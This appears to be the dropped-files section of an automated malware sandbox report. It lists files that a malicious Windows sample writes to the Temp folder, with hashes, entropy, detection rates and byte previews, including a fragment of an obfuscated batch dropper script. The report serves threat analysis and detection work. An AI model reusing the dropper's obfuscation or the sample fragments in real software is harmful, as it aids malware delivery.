                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):84992
                                                                                                                                                                                Entropy (8bit):7.997654801541492
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:1536:Fa3JIRKrsGJg7ByP7VwJ2HE9MM79VhQCgHP/+YmXQWnT805ICQg:Fa4OHJCyP7VwJ2tMPhoOYmXvnY0SCQg
                                                                                                                                                                                MD5:34BB7DA2EDF7DD73EA12C1ADCD594EFF
                                                                                                                                                                                SHA1:2760253CDD8A880346D22217E5FF0DA3872826FA
                                                                                                                                                                                SHA-256:294ECE3F8DAC08641F61D1E9C3BE014C410C5F50783E27D0D4B063646CB86C5E
                                                                                                                                                                                SHA-512:098659D2689B68D396DAAABE64E12ED2E3068868A53CC709275409165401200A7671DA54467FE3AA4D43AD22D0A353D562A27553DC63D550310503102F11F7AC
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Preview:.$..)..:.s........>..H.W..U.s;1..Y.gI:D.y..c"9...1.x......-cY.{..|.......4p..%..0a.(e.r.x.z.N.".!...h+Ywt.PJ.O*..Uw.....,...._.....?.w...w6d....O.u.?:.p.3G........@k...^..P...GP.Z.`.9.k...M.91.....C..o.-.s...[.....f.a.::..F.../.y.,["..W.O.C..[.....)...gp%\._X..xqEM.w....;E.....@...x.....]=g.....\K._Q.!.h.q0.Qr......a.-f...}....u..i..&y..E5q....h..W.e..D(....E...5.lH...u....m`..)Ad...Y>G..r...6.......-.W&.....pTRy..d....YL.y..D..+wiY*..=.Y..(..+.D.I+\k...;...r.'.hp...Z..x.s..n.x..S.`...3.'n,......H.Q...xs#u.P.mA.......:..4..=....L...@..m.....}....=/.gm...l.j....[..I..k....46...Wk[.j..w.:.Q.Q...0i Hj}Q."p).h..#....&......L.".8.....:C.....Q....)...$<._.K6A..Zo.]svRFd...Et.LK.*..:n.9..D..xc.8B.m.......gh...X3.w.E...~.iB.l........BH..d.p..O.%...r.V.b....M!9..%h..[B....R),...$m.lAu...FA......sQ...-.!...2#.....jz).p...cO.g.....P.1[...>[...r.r.$.....>.3...=(.[9EW?.=p....e..4.a..h...6*U.EL.d$.e.N.....7..d...S.QuC..._..:.......q...?...t..L.]..k..E...

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\3E6C.exe

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1401856
                                                                                                                                                                                Entropy (8bit):5.46718710825262
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24576:UUK9HMrB8lbfCe4kp6HeFSCX3NXb4mLibM9HU6UkALbnVQ3E2qZjt:UUKk8jp68oLbnVQ3E2
                                                                                                                                                                                MD5:22059CF3BA4B5338116E054D63DBCB46
                                                                                                                                                                                SHA1:875B2DA18119A55395C4611DEDF31B34420B6111
                                                                                                                                                                                SHA-256:C8D9334DAFBBA9DB79280A2567D9D2EDE04E27255C528DFF3C13E589F34E7125
                                                                                                                                                                                SHA-512:4648684573901D71EEC1BE491AB5700E6AA6A2C0ED5DCFD734D071F65D78BAB203377683A1E1B48976D1E481E42623B64945163A7D33648BF5C9233390514417
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...q.ng.................Z...........y... ........@.. ....................................`..................................y..K.................................................................................... ............... ..H............text....Y... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B.................y......H........|...............................................................*...(....*..0.......... ........8........E....@...?.......0...8;...~....%:F...& ....~&...{....:....& ....8....(.... ....8....*~..........s....%.....s....(.... ....~&...{....:w...& ....8l.....&~.......*...~....*..s.........*..(....*.0..S....... ........8........E....3.......8....(.........(.... ....~&...{....:....& ....8....*.&~.......*...~....*..0..W....... ........8........E....7.......82....r...po.....

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\77D2.exe

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):8450386
                                                                                                                                                                                Entropy (8bit):7.998613107113423
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:196608:mmC8SDW9y9ty3F5uht8rjGEDRu/Rj1KwcQAATGYsgBv:m+IvObn2Elu/Rj5cQAASYNBv
                                                                                                                                                                                MD5:5D4F3CFBB98296E43ABF01748224B243
                                                                                                                                                                                SHA1:9D0E074AAB35D472A46B5E6CA838F808AD67ECF9
                                                                                                                                                                                SHA-256:DD8D0971225090E30F92238C6ED05C9391CAFDA7B7E7C64F444A2F460908A611
                                                                                                                                                                                SHA-512:401177FF552D653F3853997C434A98989A50751AD364F8186594D67667BDA557927B5F105BBEDAAD02EDF350255E85DB8660697F1946642E3799CFEDE892C6A2
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X|.N.................n...\...B...8............@................................._.....@.................................4........@..~...............$......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc...~....@......................@..@.reloc..2............@..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\A723.exe

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):7286372
                                                                                                                                                                                Entropy (8bit):7.9991819785031435
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:196608:eYubcdKxLsPg2rg13ODnxyhvS4WZdYY+TLsR7GC16:eYuUgmU13kxevGZdSI7G26
                                                                                                                                                                                MD5:3B3D41663F63FF253217889380CDE23F
                                                                                                                                                                                SHA1:D338479F5F718447946011501AA15B1DE6F95277
                                                                                                                                                                                SHA-256:7ED0F20B8BDC47A64BF8F212BF028DB874C6453A3C853400CA2A5C984C43B467
                                                                                                                                                                                SHA-512:5DCBB647EEA1E456ABC40DBE13D16F84F15B5587596625F901F605536D0B3DA39394C035129541F970C36050404C32F4952D85CDE070F000B444FABB6A4CF015
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8............@.................................S.o...@.................................@............u............o.`(...`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc....u.......v..................@..@.reloc...............$..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Birth

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A723.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines (772), with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):16426
                                                                                                                                                                                Entropy (8bit):5.122447975785275
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:b2wpeRmZpGXCT9tlHJJQlW5V0DwMYGfnpymHEG/1ezn:CZQTGA9/Jil4qfnnkG/kzn
                                                                                                                                                                                MD5:6B6AE9A25B072F738BEF6406FC6B8546
                                                                                                                                                                                SHA1:18A47C880967689D9EA5A3C418DAD896D99E8E8C
                                                                                                                                                                                SHA-256:5D56D7A70E039155922611DAE734E51D2AE11E8118AA305F04EE5A0501558493
                                                                                                                                                                                SHA-512:6DCF4BB34CACC393FB57611290BBBE22CE7B32A200A4BCED8D747B2E6150739CA3C266F7154189717811191CA206D97D3ECDF462E76DEB73FED9EEF94F153027
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:Set Conflict=N..dzVolunteers-Commonly-Cheat-Locks-Duke-Anime-..LoJRestaurant-Correction-Stability-Testimonials-Spreading-Drag-..bZDr-Templates-Pins-Stations-Village-..pbqaBaseline-Attorney-..qCReturned-Wars-Typically-Framework-Beyond-Received-Developer-..wZEnables-Assurance-Sept-Suffering-Grams-Celebs-Precious-..mJCan-Fo-Dramatically-..Set Optimal=Q..PGQStarts-Artistic-Usb-Fiber-Customize-Copying-Mating-Signatures-Tracked-..hZEpGoing-..CjlKInduction-..tvoMajor-Statistical-Owns-Postposted-Developmental-Pursuant-..QjgUCentre-Dive-Grow-Sized-..vlpuTvs-Delicious-..GkQInch-Desirable-Scenes-Antibody-Univ-Dress-..sDSyracuse-Expand-Discussed-Change-Has-Peace-Showcase-..Set Iowa=1..zyReporter-Parent-Where-Suggesting-Gmbh-Challenged-Back-Returned-..LQsuLeisure-..VMabSharp-Costume-Removable-Architect-..TnDual-Div-Sixth-Industry-Assess-Bo-..bsMean-Debug-Whom-Kilometers-Albuquerque-Businesses-Trainer-..tgvxAgency-Picks-Levy-Uruguay-..Set Ryan=w..ztTraffic-Worcester-Leon-Indianapolis-Having-Starter-

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Birth.cmd

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines (772), with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):16426
                                                                                                                                                                                Entropy (8bit):5.122447975785275
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:b2wpeRmZpGXCT9tlHJJQlW5V0DwMYGfnpymHEG/1ezn:CZQTGA9/Jil4qfnnkG/kzn
                                                                                                                                                                                MD5:6B6AE9A25B072F738BEF6406FC6B8546
                                                                                                                                                                                SHA1:18A47C880967689D9EA5A3C418DAD896D99E8E8C
                                                                                                                                                                                SHA-256:5D56D7A70E039155922611DAE734E51D2AE11E8118AA305F04EE5A0501558493
                                                                                                                                                                                SHA-512:6DCF4BB34CACC393FB57611290BBBE22CE7B32A200A4BCED8D747B2E6150739CA3C266F7154189717811191CA206D97D3ECDF462E76DEB73FED9EEF94F153027
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:Set Conflict=N..dzVolunteers-Commonly-Cheat-Locks-Duke-Anime-..LoJRestaurant-Correction-Stability-Testimonials-Spreading-Drag-..bZDr-Templates-Pins-Stations-Village-..pbqaBaseline-Attorney-..qCReturned-Wars-Typically-Framework-Beyond-Received-Developer-..wZEnables-Assurance-Sept-Suffering-Grams-Celebs-Precious-..mJCan-Fo-Dramatically-..Set Optimal=Q..PGQStarts-Artistic-Usb-Fiber-Customize-Copying-Mating-Signatures-Tracked-..hZEpGoing-..CjlKInduction-..tvoMajor-Statistical-Owns-Postposted-Developmental-Pursuant-..QjgUCentre-Dive-Grow-Sized-..vlpuTvs-Delicious-..GkQInch-Desirable-Scenes-Antibody-Univ-Dress-..sDSyracuse-Expand-Discussed-Change-Has-Peace-Showcase-..Set Iowa=1..zyReporter-Parent-Where-Suggesting-Gmbh-Challenged-Back-Returned-..LQsuLeisure-..VMabSharp-Costume-Removable-Architect-..TnDual-Div-Sixth-Industry-Assess-Bo-..bsMean-Debug-Whom-Kilometers-Albuquerque-Businesses-Trainer-..tgvxAgency-Picks-Levy-Uruguay-..Set Ryan=w..ztTraffic-Worcester-Leon-Indianapolis-Having-Starter-

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Bookings

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A723.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):893608
                                                                                                                                                                                Entropy (8bit):6.620254876639106
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12288:DpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:DT3E53Myyzl0hMf1te7xaA8M0L
                                                                                                                                                                                MD5:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                                                                                                                                SHA1:F2F57024C7CC3F9FF5F999EE20C4F5C38BFC20A2
                                                                                                                                                                                SHA-256:865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
                                                                                                                                                                                SHA-512:57D56DE2BB882F491E633972003D7C6562EF2758C3731B913FF4D15379ADA575062F4DE2A48CA6D6D9241852A5B8A007F52792753FD8D8FEE85B9A218714EFD0
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                • Filename: NativeApp_G5L1NHZZ.exe, Detection: malicious, Browse
                                                                                                                                                                                • Filename: sXpIsdpkzy.exe, Detection: malicious, Browse
                                                                                                                                                                                • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                • Filename: 'Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                • Filename: JSWunwO4rS.lnk, Detection: malicious, Browse
                                                                                                                                                                                • Filename: Yn13dTQdcW.exe, Detection: malicious, Browse
                                                                                                                                                                                • Filename: DM6vAAgoCw.exe, Detection: malicious, Browse
                                                                                                                                                                                • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\C3F.exe

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1160471
                                                                                                                                                                                Entropy (8bit):7.97857391780465
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24576:C93RugwQd6647Do+IyenPiAwqmwVcnqlaZqvLGTK10:4Rugw/hAWqmXqc4e
                                                                                                                                                                                MD5:53C60D599AA498ED4EFA79BA0B12E29F
                                                                                                                                                                                SHA1:969A751E4C24B9E4487FF62908B230DD554A2ACC
                                                                                                                                                                                SHA-256:8DCCE53EA838F3F97B8AFF36E0A1FFD70AEB1DE6B8C6E5D6B530499A07E59FCE
                                                                                                                                                                                SHA-512:37A8321DDF2389A12BA014F721C6CD361F3437BE1ABCE99D8E1A6F3337297DC78591F0E930411A279E2E4CEF14792C0290581E5009D748B413D44B97DA9AD53E
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 13%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X|.N.................n.......B...8............@.......................... .......|....@.................................4........@.................. (......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc........@......................@..@.reloc..2............r..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Cumshot

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A723.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):35565
                                                                                                                                                                                Entropy (8bit):7.995026829437027
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:768:GS0fKZZHkBqdnXmNkp+rgrpyFbLsywALlVk9F5M9ZKnYpBonrxzT0QIOj:GS0CZtk0nXma2grpyFbYJH9vM9ZKnwiJ
                                                                                                                                                                                MD5:6517F12CB18B6B1DCAE8574EABA118F2
                                                                                                                                                                                SHA1:5497C848BB64C66EEEB8D2C9965061EBE44B164C
                                                                                                                                                                                SHA-256:948595DB4AB47B05E8D3FB45F875512B80A580B07239E80DC5A874437B9047B9
                                                                                                                                                                                SHA-512:CBC45AF038FE95D78FEA5743CC7D757FC644D93884565819CFA16400A7143A3234395549CAB36206BD10BBA95325260E5439638A966AB3855A65AEED9F341F3C
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Preview:...^eU..n.V.U*..z...1s.$....H.d;o..(...d...w$.R#.K.8"k..:b.sWH..K.....K...f..8..O..w..../t..^.......uH.#...W...W..n^..Xgg.fx.^...(.V.N.n..W..f#..]..?....y..KG;...;ly.....Z....f.61,g?'..Wy..G.u.....,....@....lH..G@.|.=..q\#!.Xr.....D..............K.<.sEG.v.c.......U?..B....#..E...r.......|..PQ.?..jVi.>..".!.o.<....,.}U.xB^!"....W..|..O.42.......:..}..k..#eY..C...Kx.C..3.do......#..^J..u.#GN.X9)...U..|.......Dx.t"...o.BH...{..x..@..i...oD.1........9...D@.19P.^.@.s.`.;5.u|_...oN....k^.r.........q..k.%`".uy-...eL .........V..o(FLw+..v..-F,...c..]T.CG.:.a.Y.m.,=... ......;......E......X.f.~...0!.b%I*..fp.=.<..33}.y.0.B4*D.O../..Xl6R.........Y..QLE.......2a....|....y.m.`.t.I&...h....Agm....[....vfw..wPdw...4.....D....6.zRL..&.Y.&......%N.>...&.x......I..E.~.c...D.GsuZ=DQ.d..t.J..q.o......1i...c"%..#..F.&...........1..i...:.......A\...%.?X.:=....G....Jm..|@...b.&..)..._/....M.IH3.t.'...P.A.*...c.m.4..J.>Q&.u.DC..$...q._...M.\.`s/..`J\.)../....n..g

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Customise

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A723.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):912384
                                                                                                                                                                                Entropy (8bit):7.999805378227024
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:24576:m6y8a+pvrt1/pf++iA/Qzk/kbNbNlbN9WUKgCxIrB0o:XRjt1RJNQ4/kb/9HJCarB/
                                                                                                                                                                                MD5:16ECD01698A0A5A2509A634BD716C5F5
                                                                                                                                                                                SHA1:D14347C9482E405037874387E1F36B72F6E8529E
                                                                                                                                                                                SHA-256:5A205B9BD0483FCC5D7F0C6D8C1D254886AB8D08BB5DE1B57996A5D0E6CEC089
                                                                                                                                                                                SHA-512:104761D3F4CBF9507A6E744E2AC632E723F6CBCE193024A988377A6F888F299D34AD4CB81DBC52B2311D2246DA12D1E9E6FF184514A49291888D52E49D943B92
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Preview:H.\|c..Ai.*z?).M.......#d...b..yS....&...1....##u.+.h..3[9U..O8.h..w.>..U. .KP....>..q.E7......>.[k.m.....5~.)*..s//.\O2.3.....l:.3._.....F.G>`r.....l.f.)k..5..f........aY....9}UkC.J....6....,.<...a4....AV...6.n...r\5......#i..9.........qKt".3.]........jx.,...w4...47.z.j..'...2.Xh..F.bb.....[mg....'..[...|.N..%...6.'..Ujo........I.:.....|.^..}..hS..uE3-.%.....:......q0...)...2.U..O.a.i.!...s..j..G...89a|X.b.j...D}.0.0.B...i.d...v..|..J..>...6.Piu1..W#.v..U,......z._..[_...1$.....#`....F....o.J.{=...r....z..5f.~.....Gq$E.{K.1Of...b|@......?..#.....^.E..FX.&.X..wno.[W...>^.@./9.tG.a.{.o..Z..c..E%.[0..O..m...o.........MJX..........8.[*..9./|hs*._v^...Z.'.M.|2.Kp....l...W............i!.......'...)c-..[........g$.....%.c..x..j.i...j\[a}Gf..iR2.t<...Z.{..6.6N;........Z..%..X./..U'x.m ...5........t..k.u.Jy.:~.^.P. s.'.C..E0.:.8..1`gK...w.)`..../....B.n.F..G.....En.".-.b..sx?...w|...E.R.....b.k..%Uo.GY#..a.r....-.].1...U_.T,k..~?.`..w.-/.{.

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Handjob

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A723.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):900096
                                                                                                                                                                                Entropy (8bit):7.999817470486428
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:24576:nU3tIzKeX8mO9ck45xynKIM9aM0pGPIViU8eOY9vvD5V:nGtIhsF9cP5xynKIMMpGgCYBn
                                                                                                                                                                                MD5:2F48729169D18C8966524ACA35E319DD
                                                                                                                                                                                SHA1:8A8E1799C9ECEFBA40C52B318D697387A288653A
                                                                                                                                                                                SHA-256:CD9511A88E161EA956D9577AECB96315B03F77E772F1E6D2A658E0A24D3CE9FE
                                                                                                                                                                                SHA-512:F2F2D17D001FBEA8327D1FFBDE6DF89DF99710A16ACD1166974512A05689A5059D2D042B7418DC9753EC1B2DBAE8BD797584DB77776D81FCBB47CBE0A056A5AD
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Preview:U..d..&.3[U.kJ.`S.M..._.E.+Wt=..@M.2SR...)/o..H..S..b.....j....I.L.....[.G.<..x..0..lM.....qZ.g...~......l!{).l...OuD......_..1..8."{...l..c..x...b...!v.....t{^sU..f.+.F*]....c0Y./.........;/.<..+6.\@..%....i9.zm..SK..<.}.Duj..;....l$..m.c.n..$ywJci.:.-.J..h.a..".7....l........}....Y[...ZQ..?.......G..e4...1.i..s~.....z....3.....N..@...|..zf./Uu....\.}..bH1.jgN../../.#t.I.Dw..G,...SK.hITd.X...d{<@L.....O...0.,.<9...0%.g.F.})P.h.r.H..h.m.....)...,j1...q51.o.2......_.0...).e..xtq..3(z[....C.I.iQ..a....HRe?5...x"..y.J.Q@H.eb..*.Z0N.6../!...R...u:......R.......i.ZL.....e.E_...{AU..Xht|*...H..M.]...r.2...)..I[Y..C/<.%.#.....dp..0.e"..C.{.'.C...........Z...m.........<......s..g66.3...+......V..A..P.$L....Xxfk..P>........g.pk.M2)Z.1.......E....S.U.oU.+..!1.y.......Ms~.f..cPy}g...1~l.sx...P.q0rJ'.h..Y1..~<..M......G.z......."r~I......$.....v.R.4(.-u....#.....p.E....w.A....#...~ .#*.z.iO...?.....l..K.&y.I..G.F.e.[[....e.'.VA..W..yY"F,..%.6...s.#

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Investigators

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A723.exe
                                                                                                                                                                                File Type:PGP symmetric key encrypted data -
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):867328
                                                                                                                                                                                Entropy (8bit):7.9998173993765995
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:24576:h6s+0v798mOtdYcHjvhY5B6B/wb8RqWpXJZrLUTDCnC:h04TSLvhQB6Bo8R9YCnC
                                                                                                                                                                                MD5:8B9B0F5CC23219A66CB34CA0E0D2F435
                                                                                                                                                                                SHA1:ED2D72FCD92DBE07B3947ABE4CBF0D504B0E5750
                                                                                                                                                                                SHA-256:FA91AD8C8A7DB23C1AF687D18F9D9E8894EA67C21D6B6EF32CFAADB652E4E079
                                                                                                                                                                                SHA-512:C870DD8C8D3168C177C40B2B16E1873B6236D1E545CB772C4FA34B16C843F996E8454148F0D75D4957C6476E6F95D8C8F70937247431CA30639742EDC84DA8A0
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Preview:..Dl.xB..../+o.</..}.`/iUp.ae...0.*T.b{.[.....N.Qq....I.=.#..Jy.W+.FD.".^F!.a.^."...K.. .F..?...bp...i.N.G.~.%:P..:.B........p.h.W~N..V.Y).2...E.....-).^k8.e............mG..;.\..j9..-...X...F.T.0#..c...C....0.P.'m....W....'QX..l.WqG..r2..(u.....~b....E,.M.0.O&<}...].N....P@......P..,.{2.....8).M.R..S.....h.J~S-...B..P.U.....:V..../4r?..S..O...(J......^C1...-.....[..p.8r..3..q{G|.....A|..l...(pd{c......=+..V].WMK)......x...j.....;M..%...M{'.'9N..q.I.F.......6g...4...)..."P..F....W....O..TgWE...9.d.ctE..=.,w.z....g...M"3.2B.......K..[h..~..]..P.A...@A..i..kj...=-E.....b..E. .....)........T...P~....w....t...+N....3.R........-..]..&u.'+.^.m.G..tS kJ..u.Y....F.&p.6yB...y..=g{p.,..)Wg.,..'Z'.S~........B|......9.....M&O..Q3...s92..{...#o(...h.....G:.....+........kAJ...p..F...o....+...2b...Fp..~..X.n......~.zB"S..8.....:^.*m.L}......'.5...E.}b.w...u...P..`.1.e4..b..lYR.[.5.7...;...>..U....HWP..."...m.o.hj.......R.:x..K....^.......{+.g.-....O..Nu.

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Realty

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A723.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1010688
                                                                                                                                                                                Entropy (8bit):7.99977432269652
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:24576:sA1h4l0hb9BepG2v8VsSEA/4oFXQeUQmlcEYShHJJ+ThG49qYHYqtZDGjwm:sll0R7epl/SEs4odQeUaEY2+T59KdjH
                                                                                                                                                                                MD5:8CF19EE46246A432A43A5AD235D51C2E
                                                                                                                                                                                SHA1:74E62E2A5DD0823172FFA1E32EEFF465DAFBA8D5
                                                                                                                                                                                SHA-256:0872925D9C0B807B94203B4D57F645C4990E7CF23B1794F16DD8289FA6F318F3
                                                                                                                                                                                SHA-512:2364B77D67F493B83A0B6121B3AAF533A16BDF26B2022E8719B8A12CB3ECE05CBCDEFC19E83E0338A85CEA121BA7D114B72DD391322F12478D185F34E1337533
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Preview:....qsA..k.g..Jnt?,p/.....Xa..Z.:'G.Z(:}...C.n...S.&&lK"..^.tF.[...{^?...m....b..{.[..I..t.4.R......GiiPA.3@5.....A.......%z.R.W..[WM..lx..=.bL\.%n....6.x....3f\.....j=.....Q#.d...7D.o:^m....l.^..]G..a[...=..t0.M..e32&.".#P~..B*l1..<.1...;/.)..._Bs._OlVRv".+^..\....%..4...=.........uE..I.m....@.....m.`..U(...)].k( b.G...t.G.1.....^..j,.@..e....#..Q.....`..kt`.-w..Y.'..h/..}?....Cc..f.x;...3.S4.v!..@.V'*..b.z?.).21?...x...r...fi."Xx..8.'.l....m.......b[.a.P./QGy4.$..E..5. TA.~..Qc...*......l..p........>.......E.U.6X.B"..V>......m'-.M.{.........p..wM5oSL.....1x.X.....B.h.R......0.3.k.......D...A.T.~..x..dk..O.qc..^..*...o..3NL......6.&:.D...,a....r.....(....p0kE.P.....W/....qw.i$~SU..&....x...".$.T..?.q.w...]...x........*,...s...\.-.'...V.....'.w|...."]..8q....M..3E...<*...T.g..E.M.F)V.{^....i..r....../"..`.(~5..NW.AV.....e.5..*.&...3........W7.....%..Tu.{..>....g.%4..tz..9...3.`.s...........cZ..j/,..P.,.D.....[/.,1..I..52&...k.6.....'.

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Seconds

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A723.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):740352
                                                                                                                                                                                Entropy (8bit):7.999762571010334
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:12288:/ALMxo6fYR6BSk/RCygweZ8CAJ2Qfay9RBUPePwrLqj+6MGc6XOVaAhsODjiw:/ALMiEBSCQNZ82a9oPe4n7Gc6eVyYiw
                                                                                                                                                                                MD5:CD4A68CBEB473B21D41CA8489ADD35B7
                                                                                                                                                                                SHA1:6B631EFC0E8DA1430CE07BA6C3CF5B88D6C8C1E5
                                                                                                                                                                                SHA-256:E2D10FEE0853F5A32C9238FD3261C4ACECA0EB4AFBA16FDCA458838C064FD36F
                                                                                                                                                                                SHA-512:578774B1CE64BC0D29DFC7F5DF5077BD434CA5E116246CEE12E666A8CDA65C6687FA0E0523ED50084E7F53CCB5D95520B4B1D6274DA94CA4255F3E320FB86CE9
                                                                                                                                                                                Malicious:true
